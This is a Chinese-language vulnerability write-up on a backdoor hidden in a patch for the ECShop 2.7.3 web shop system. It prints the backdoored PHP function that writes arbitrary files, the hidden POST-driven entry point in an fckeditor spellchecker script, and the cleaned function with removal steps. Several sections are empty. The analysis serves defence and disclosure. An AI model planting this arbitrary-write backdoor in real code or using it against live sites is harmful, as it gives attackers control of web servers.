catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
ECShop是国内一款流行的网店管理系统软件,其2.7.3版本某个补丁存在后门文件,攻击者利用后门可以控制网站
Relevant Link:
http://sebug.net/vuldb/ssvid-62379
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
/includes/lib_base.php
//隐藏了逻辑型WEBSHELL后门
function write_static_cache($cache_name,$caches,$newname,$newfile)
{
if (!empty($cache_name))
{
if ((DEBUG_MODE & 2) == 2)
{
return false;
}
$cache_file_path = ROOT_PATH . ‘/temp/static_caches/‘ . $cache_name . ‘.php‘;
$content = "<?php\r\n";
$content .= "\$data = " . var_export($caches, true) . ";\r\n";
$content .= "?>";
file_put_contents($cache_file_path, $content, LOCK_EX);
}
//任意写入任意文件
else
{
@file_put_contents($newfile, $newname);
}
}
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
//黑客将攻击入口放在了一个较深的目录下,避免被管理员发现 $newname = $_POST[‘newname‘]; $newfile = $_POST[‘newfile‘]; //提交POST请求后,可以任意写入文件 write_static_cache($cache_name,$caches,$newname,$newfile);
Relevant Link:
http://webscan.360.cn/vul/view/vulid/1063 http://www.2cto.com/Article/201305/213322.html
5. 防御方法
/includes/lib_base.php
function write_static_cache($cache_name, $caches)
{
if ((DEBUG_MODE & 2) == 2)
{
return false;
}
$cache_file_path = ROOT_PATH . ‘/temp/static_caches/‘ . $cache_name . ‘.php‘;
$content = "<?php\r\n";
$content .= "\$data = " . var_export($caches, true) . ";\r\n";
$content .= "?>";
file_put_contents($cache_file_path, $content, LOCK_EX);
}
//将逻辑型后门删除
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
//删除如下代码 $newname = $_POST[‘newname‘]; $newfile = $_POST[‘newfile‘]; write_static_cache($cache_name,$caches,$newname,$newfile);
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
时间: 2024-08-11 13:42:26